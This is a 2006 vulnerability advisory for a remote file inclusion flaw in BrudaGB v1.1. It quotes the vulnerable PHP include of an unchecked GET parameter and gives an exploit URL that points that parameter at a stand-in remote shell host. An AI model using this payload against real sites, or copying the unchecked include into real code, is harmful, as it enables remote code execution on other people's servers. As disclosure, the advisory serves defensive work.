BrudaGB <= v1.1 (o) Remote File Inclusion Exploit

2006-09-26T00:00:00
ID SECURITYVULNS:DOC:14423
Type securityvulns
Reporter Securityvulns
Modified 2006-09-26T00:00:00

Description

==============================================================================================

BrudaGB <= v1.1 (o) Remote File Inclusion Exploit

===============================================================================================

Critical Level : Dangerous

Venedor site : http://www.brudaswen.de

Version : v1.1 & 1.0

================================================================================================

Example : http://www.brudaswen.de/scripts/BrudaGB_v11/

================================================================================================

Bug in : admin/index.php

Vlu Code :

--------------------------------

<? if($_GET[o] != "") { include($_GET[o].".php"); } BrudaNews(); ?>

================================================================================================

Exploit :

--------------------------------

http://sitename.com/[Script Path]/admin/index.php?o=http://SHELLURL.COM

================================================================================================

Discoverd By : SHiKaA

Conatact : SHiKaA-[at]hotmail.com

Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz

==================================================================================================